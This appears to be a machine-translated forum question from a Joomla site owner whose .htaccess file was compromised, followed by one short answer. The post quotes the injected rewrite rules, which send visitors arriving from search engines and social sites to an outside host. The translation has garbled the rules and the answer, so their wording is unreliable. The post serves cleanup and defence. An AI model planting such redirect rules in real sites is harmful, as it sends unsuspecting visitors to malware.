在这里寻求一些建议。
我运行一个基于(旧版本)Joomla的网站和论坛。截至周末,当用户开始收到反病毒软件警告网站上存在恶意软件时,一切都很好。
运行了Google网站管理员工具,它指出.htaccess文件中存在恶意软件。
果然,我可以看到.htaccess文件确实在Malware报告开始的早上更新了。我在这里读了一些其他的q,这表明这并不罕见........而且我也读过一些建议,你甚至可能需要.ht访问文件。
我发现的是:
RewriteEngine On
RewriteCond%{HTTP_REFERER} ^。(google | ask | yahoo | baidu | youtube | wikipedia | qq | excite | altavista | msn | netscape | aol | hotbot | goto | infoseek | mamma | alltheweb | lycos | search | metacrawler |冰| Dogpile网站| facebook分享| |博客|生活| MySpace的| LinkedIn | Flickr的| nigma | liveinternet | VKontakte等| WEBALTA | filesearch |嚷嚷| openstat | metabot | nol9 | zoneru |千米| gigablast | entireweb | amfibi | DMOZ | yippy |搜索| walhello |的WebCrawler | jayde | findwhat | TEOMA的| euroseek | wisenut |关于我们|雷震| Ixquick转移|兵马俑| lookle | metaeureka | searchspot |滑块| topseven | allthesites |自由人| clickey |星系| brainysearch | pocketflier | verygoodsearch | bellnet | Freenet的|火球| flemiro | suchbot | acoon | CYBER-内容| devaro | fastbot | netzindex | abacho | allesklar | suchnase | schnellsuche | sharelook | sucharchiv | suchbiene | suchmaschine |网络档案馆|。InfoSpace公司)( )
RewriteRule ^(。*)$ http://laspector.pro/cyrculate?8 [R = 301,L]
RewriteCond%{HTTP_REFERER} ^。(web | websuche | witch | wolong | oekoportal | t-online | freenet | arcor | alexana | tiscali | kataweb | orange | voila | sfr | startpagina | kpnvandaag | ilse | wanadoo | telfort | hispavista | passagen |喷雾| eniro |特利亚| bluewin | sympatico | nlsearch | atsearch | klammeraffe | sharelook | suchknecht |易趣| abizdirectory | alltheuk |班瓦德|水仙| click4choice | EXALEAD | findelio | gasta | gimpsy | globalsearchdirectory |指南| jobrapido | kingdomseek | mojeek |搜索| simplyhired | splut |在竞技场| thisisouryear | ukkey |乌韦| friendsreunited |家安| QP | RTL |搜索比利时| apollo7 | bricabrac | findloo | kobala | limier |表达| bestireland | browseireland | finditireland | iesearch |爱尔兰信息|康帕斯| startsiden | confex | finnalle | gulesider | keyweb | finnfirma |克瓦希尔|萨维奥|溶胶| startsiden |所有页|美国| BOTW |茶铺|克莱蒙特|艾瑞| clush | ehow |翻得好| ICQ |咕|。westaustraliaonline)()
RewriteRule ^(。*)$ http://laspector.pro/cyrculate?8 [R = 301,L]
/ IfModule>
恶意软件检查所指的特定项目是Laspector。
所以,我的问题是:
该网站是开放获取的(无需签名),论坛需要注册并登录,如果相关的话。
感谢任何人提供的建议。
答案 0 :(得分:0)
你应该绝对没有删除你上面的所有东西。但是我建议你用你使用的Joomla的任何分支中的.htaccess文件替换它。